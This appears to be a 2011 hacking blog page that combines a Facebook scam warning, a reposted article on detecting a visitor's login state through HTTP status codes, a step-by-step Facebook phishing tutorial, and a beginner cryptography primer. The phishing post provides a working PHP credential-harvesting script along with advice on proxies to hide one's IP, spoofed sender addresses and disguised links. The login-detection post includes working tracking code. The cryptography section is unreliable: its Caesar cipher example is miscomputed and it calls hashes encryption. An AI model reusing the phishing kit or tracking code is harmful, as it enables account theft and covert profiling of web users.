Dec 15, 2011

Beware! Facebook Scam "Yeahh!! It happens on Live Television!"


we recently covered about a facebook worm which targeted a whole lot of facebook users. It's really sad to see that these types of scams keep growing and facebook hasn't really been able to successfully give protection to their users from such scams.

A new bloke in the list "Yeahh!! It happens on Live Television!", the most viral one yet, is spreading like a wildfire among facebook users.


The following status on one of my friend's wall bought my attention first towards this scam:




Yeahh!! It happens on Live Television![LINK] 
Lol Checkout this video its very embracing moment for her

The lady is the above screen shot is Marika Fruscio an Italian Model, She had Wardrobe malfunction (Accidental exposure of intimate parts) on a live TV show, which is what the scam refers to.


On clicking the link, Facebook users are directed to the folllowing page:




In order to play the video the user has to click the button "jaa", which appears as an age verification system required in order to watch the video. when you click on "jaa" you are infact clicking on a hidden link which consequently post the same link on each of your contact's wall. Next a survey is prompted which the user needs fill in order to watch the video, thus helping the scammers make tons of money.




While searching related to the scam on the internet, I managed to find the source code of the scam on pastebin, This proves that there is not a single body behind this scam, with the source code available in public, any one could create a website and inject the malicious javascript in to it and start scamming.

One more thing to note is that in most such cases blogspot blogs are being targeted as they are free to create, You can create a blog in less than 5 minutes. If this keeps growing, I believe that blogger will stop giving free blogspot blogs and will maybe switch to a payed system or facebook would just disable blogspot domains from being shared, thus making it difficult for real bloggers to market their blogs.

How To Remove The Scam?
It's fairly easy to remove the scam, all you need to do is to report it to facebook. 



DIGITAL DESTROYER'S: Abusing HTTP Status Codes to Expose Private Inform...

DIGITAL DESTROYER'S: Abusing HTTP Status Codes to Expose Private Inform...: When you visit my website, I can automatically and silently determine if you're logged into Facebook, Twitter, GMail and Digg. There are al...

Abusing HTTP Status Codes to Expose Private Information??

When you visit my website, I can automatically and silently determine if you're logged into Facebook, Twitter, GMail and Digg. There are almost certainly thousands of other sites with this issue too, but I picked a few vulnerable well known ones to get your attention. You may not care that I can tell you're logged into GMail, but would you care if I could tell you're logged into one or more porn or warez sites? Perhaps http://oppressive-regime.example.org/ would like to collect a list of their users who are logged into http://controversial-website.example.com/?

Ignoring the privacy implications for a second, as a website developer, you might like to know if your visitors are logged into GMail; you could use that information to automatically fill the email fields in your forms with "@gmail.com"... Perhaps you might want to make your Facebook "like" buttons more prominent if you can tell your visitor is logged into Facebook at the moment? Here's how I achieve this:


First of all. Lets check if you're logged into GMail right now (not including Google Apps)... (No, you're not logged in).
Now, how did I get that information? Really, really, easily... I generated a hidden image in my HTML similar to this:
<img style="display:none;"
     onload="logged_in_to_gmail()"
     onerror="not_logged_in_to_gmail()"
     src="https://mail.google.com/mail/photos/img/photos/public/AIbEiAIAAABDCKa_hYq24u2WUyILdmNhcmRfcGhvdG8qKDI1ODFkOGViM2I5ZjUwZmZlYjE3MzQ2YmQyMjAzMjFlZTU3NjEzOTYwAZwSCm_MMUDjh599IgoA2muEmEZD"
/>

I generated the URL in the "src" attribute by logging into my own GMail account, then going into the general settings and uploading a picture in the "My Picture" section. I then ticked the "Visible to everyone" checkbox, and right clicked the uploaded image to get the image location. Fetching the content at that URL does two different things depending on whether or not you're logged into GMail. If you are logged into GMail, it returns an image. If you're not logged into GMail, it redirects to a HTML page. This is why the img tag in my example above works. "onload" is triggered if an image is returned, but "onerror" is triggered otherwise.


I tested this technique in Firefox, Safari, Chrome, Opera and various versions of Internet Explorer and it worked in them all. I reported it to Google and they described it as "expected behaviour" and ignored it.

At this point, you might be wondering why I have "Status Codes" in the title; the method I use for attacking Facebook, Twitter and Digg is slightly different and works because various URLs provide different HTTP status codes depending on your logged in status. Unfortunately, this attack doesn't seem to work in Internet Explorer or Opera, but does work in Firefox, Chrome and Safari. If you're using a non-IE, non-Opera browser, here are tests for Twitter and Facebook:
Are you logged into Twitter ? (Yes, you are logged in)
Are you logged into Facebook? (Yes, you are logged in)
If you have JavaScript disabled on twitter.com and facebook.com, the above tests wont work. Here is how they work when you have JavaScript enabled:

<script type="text/javascript"
        src="https://twitter.com/account/use_phx?setting=false&amp;format=text"
        onload="not_logged_in_to_twitter()"
        onerror="logged_in_to_twitter()"
        async="async"
></script><br/><br/><script type="text/javascript"
        src="https://www.facebook.com/imike3"
        onload="logged_in_to_facebook()"
        onerror="not_logged_in_to_facebook()"
        async="async"
></script>
In Firefox, Safari and Chrome, the <script/> tags fire onload if a 200 HTTP status code is returned, even if there was no valid JavaScript and the Content-Type was text/html. But if the status code was one of 404, 403, 406 or 500, then onerror is triggered instead. In the above examples, the Twitter URL returns an error code if you're logged in, but redirects to the login form with a success status code if you're not logged in. The Facebook one works because my profile is only visible to people who are logged in and returns a 404 if you're not. There is a similar problem with Digg. http://digg.com/settings returns a 403 status code if you're not logged in, but a 200 if you are.


This can be an awkward problem to avoid if you're developing a website. Some of these requests could be stopped by doing referrer checks; reject all external referrers for content only accessible when logged in. You want your status codes and responses to image requests to be relevant, but that can leak information. Firefox users could defend from this problem by using the Request Policy addon. I've never used it myself because it looks like a pain to manage, but it sounds like it would do the job.

And finally, this isn't just an issue of detecting whether or not a user is logged in. The question could technically be anything, if a HTTP response results in an image or html depending on the answer, or results in a success/error status code depending on the answer.

For the web developers out there who are familiar with jQuery, as a demonstration of the usefulness of this technique. The following chunk of code will detect if a user is logged into GMail, and if they are will replace all the mailto: links on your webpage with links to the GMail compose window (automatically filling in the To field):


$('<img/>').hide()
   .attr('src','https://mail.google.com/mail/photos/img/photos/public/AIbEiAIAAABDCKa_hYq24u2WUyILdmNhcmRfcGhvdG8qKDI1ODFkOGViM2I5ZjUwZmZlYjE3MzQ2YmQyMjAzMjFlZTU3NjEzOTYwAZwSCm_MMUDjh599IgoA2muEmEZD')
   .load(function(){
      $('a[href^="mailto:"]').each(function(){
         var email = $(this).attr('href').replace(/^mailto:/,'');
         $(this).attr('href','https://mail.google.com/mail/?view=cm&fs=1&tf=0&to='+escape(email));
      });
   })
   .appendTo('body');


Dec 13, 2011

How to H4CK FACEBOOk ACCOUNT ??




How to Hack Facebook Account Using Phising webPage





Everyone eager to hack the facebook account of others.  Here is the simplest method using phishing webpage ,you can hack the facebook account of your friends .










Phishing WebPage:
     Creating webpage which look like any site is described as Phishing.  By creating Phishing WebPage, you can make users to believe that it is original website and enter their id and password.


Step 1:
Go to Facebook.com
Right click on the white space of the front page.  Select "View Page source".
Copy the code to Notepad.


Step2:
Now find (Press ctrl +f)  for "action="  in that code.
You fill find the code like this:





The big red ring that circles the action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html


Step 3:
Now we need to create the "next.php" to store the password.  so open the notepad and type the following code:
php Script
<php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


save this file as "next.php"


Step 4:
open the notepad and just save the file as "pswrds.txt" without any contents.
Now upload those three files(namely index.html,next.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.




Step 5:
 create an mail account with facebook keyword like :FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_friends@gmail.com


Step 6 :


Copy the original Facebook friendship invitation and paste in your mail.
remove the hyperlink from this  http:/www.facebook.com/n/?reqs.php
 Mark it and push the Add hyperlink button
*Updated*  
everyone asking doubts about this 6th step.   You may get Facebook friendship invitation from Facebook when someone "add as a friend", right? Just copy that mail and paste in compose mail.  In that content , you can find this link http:/www.facebook.com/n/?reqs.php .  Just change the delete the link and create link with same text but link to your site.  









Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. 




Note:
For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url.


Don't use this method for hacking others account. This article is for educational purpose only. Here is tips to prevent from Phishing Web page:
How to prevent from Phishing Web page?

CRIPT-----O----GRAPHY


Introduction to Cryptography:
Julius Ceaser who introduce the Cryptography technology. Cryptography is technology in which we are changing the plain text to unreadable text(known as cipher text) .
In your home you put money in locker, Isn't it? The locker probably has key to open. Imagine thief is coming to your home to steal. if he want to open the locker,certainly he need the key. Without the key he can not do. Yeah i can hear what you are saying, he can break the locker. If the locker is very strong,he can not open it at all.
Likewise in cryptography also we are going to create a Key for our data. So that Intruders can not read the data. It is possible to read the data, if the encryption(will explain later) is weak. So we need to encryption method very strong.



Terminologies used In cryptography:
Plain Text: original data or text is known as Plain text.
Cipher Text: The encrypted message(unreadable message).
Encryption: Changing the Plain text to unreadable.
Decryption: Changing the cipher text to plain text.



Traditional Encryption Methods:
  • Ceaser Cipher
  • Mono Alphabetic Cipher
  • Play Fair Cipher
  • Hill cipher
  • Poly Alphabetic Cipher
  • Rail Fence Technique.
Ceaser Cipher:
  Most simplest encryption method.  In this method we are going to replace the alphabets with shifted alphabets. 
Eg:
Consider Plain text is:  break
if we use Key is 3, then the cipher text will be  found by:
  
        b+3 r+3 e+3 a+3 k+3
Shifted to three alphabets final cipher text is:
         euhdn

       
If the intruders see the cipher text(here "euhdn") ,he can not understand anything.   But this method is easily hackable .  Because intruders can try 25 shifts and finally he can get the result.  
   
Many encryption methods are introduced to make better security.

Today  Encryption methods: 

  •  AES(Advanced Entyption Standard)
  • DES(Data Encryption Standard)
  • RSA(Name of the creators).
  • MD5(Message Digest -5)
  • SHA(Secure Hash Algorithm)

 For secure transaction , SSL (Secure Socket Layer ) is introduced.  In next post i'll give detailed explanation for the SSL layer.